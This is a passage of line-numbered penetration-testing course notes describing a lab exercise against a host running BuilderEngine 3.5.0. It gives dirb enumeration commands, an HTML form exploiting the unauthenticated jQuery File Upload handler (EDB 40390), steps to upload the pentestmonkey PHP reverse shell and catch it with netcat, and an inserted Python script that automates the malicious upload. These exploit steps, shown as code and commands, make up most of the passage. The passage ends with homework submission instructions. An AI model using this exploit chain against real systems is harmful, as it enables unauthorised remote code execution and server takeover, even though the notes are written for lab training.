  1546.  
  1547. or with dirb
  1548.  
  1549.  
  1550.  
  1551.  
  1552. ---------------------------Type This-----------------------------------
  1553. cd ~/toolz
  1554.  
  1555. git clone https://github.com/v0re/dirb.git
  1556.  
  1557. cd dirb/
  1558.  
  1559. ./configure
  1560.  
  1561. make
  1562.  
  1563. dirb
  1564.  
  1565. ./dirb http://172.31.2.86 wordlists/big.txt
  1566. -----------------------------------------------------------------------
  1567.  
  1568. ### dirb output ###
  1569. ==> DIRECTORY: http://172.31.2.86/blocks/
  1570. ==> DIRECTORY: http://172.31.2.86/files/
  1571. ==> DIRECTORY: http://172.31.2.86/modules/
  1572. ==> DIRECTORY: http://172.31.2.86/system/
  1573. ==> DIRECTORY: http://172.31.2.86/themes/
  1574.  
  1575. + http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
  1576. + http://172.31.2.86/server-status (CODE:403|SIZE:291)
  1577. ### dirb output ###
  1578.  
  1579.  
  1580.  
  1581.  
  1582.  
  1583. Browsing each of the directories showed that the /themes folder holds the vulnerable application, BuilderEngine 3.5.0
  1584.  
  1585. An exploit for this application can be found at:
  1586. https://www.exploit-db.com/exploits/40390/
  1587.  
  1588.  
  1589.  
  1590.  
  1591.  
  1592. -------------------save this a "BuilderEngine.html"-------------------
  1593. <html>
  1594. <body>
  1595. <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
  1596.  
  1597. enctype="multipart/form-data">
  1598. <input type="file" name="files[]" />
  1599. <input type="submit" value="send" />
  1600. </form>
  1601. </body>
  1602. </html>
  1603. -----------------------------------------------------------------------
  1604.  
  1605.  
  1606. Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
  1607.  
  1608. Change the $ip (and $port if you like) in the source code of the webshell to another server in the lab network that you have root access to; as with Minotaur, the target cannot connect back to the VPN client range.
  1609.  
  1610. On the other server run:
  1611. nc -lvp 1234
  1612.  
  1613. Then upload the pentestmonkey reverse shell to .86 with the form. The handler is the jQuery File Upload server/php/ script that BuilderEngine ships with no authentication and no file-type restriction (EDB 40390); by default it stores uploads in its own files/ directory, so trigger the shell by requesting http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/files/php-reverse-shell.php
  1614.  
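Added example (not from the course notes, and not the exploit-db script): the Python equivalent of the BuilderEngine.html form above, so the upload can be scripted and the handler's reply checked. The handler path is the one from the page; the files/ storage directory is jQuery File Upload's default upload_dir and the JSON reply shape ({"files":[{"name":..,"url":..}]}) is that script's default, both assumed unchanged in BuilderEngine. Nothing is sent unless upload() is called.

```python
"""POST a file to BuilderEngine's bundled jQuery File Upload handler (added example)."""
import json
import os
import sys
import urllib.request

HANDLER = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"


def build_multipart(field, filename, content, boundary=None):
    """Hand-built multipart/form-data body, the same request the HTML form sends.
    Returns (Content-Type header value, body bytes)."""
    boundary = boundary or os.urandom(12).hex()
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def uploaded_url(base, filename):
    """Where the default UploadHandler stores files: <handler>/files/<name>."""
    return base.rstrip("/") + HANDLER + "files/" + filename


def upload(base, filename, content):
    """Send the file; return the handler's parsed JSON (or raw text if it is not JSON)."""
    content_type, body = build_multipart("files[]", filename, content)
    req = urllib.request.Request(base.rstrip("/") + HANDLER, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req, timeout=10) as resp:
        text = resp.read().decode(errors="replace")
    try:
        return json.loads(text)
    except ValueError:
        return text


if __name__ == "__main__":
    # usage: python be_upload.py http://172.31.2.86 php-reverse-shell.php
    base, path = sys.argv[1:3]
    with open(path, "rb") as fh:
        print(upload(base, os.path.basename(path), fh.read()))
    print("now request:", uploaded_url(base, os.path.basename(path)))
```

The reply's url field, when present, is the authoritative location of the stored file; uploaded_url() is the fallback when the handler answers with something other than its default JSON.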
  1615. ============================================ Attacking another server because I need a reverse shell =========================================
  1616.  
  1617. ##################
  1618. # Day 1 Homework #
  1619. ##################
  1620. Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - CyberWar Day 1" (ex: Joseph - McCray - CyberWar Day 1).
  1621.  
  1622. Also be sure to name the attached file "FirstName.LastName.CyberwarDay1.docx" (Joseph.McCray.CyberWarDay1.docx).
  1623.  
  1624. NOTE: This is what is required in order to receive your certificate of completion and CPEs.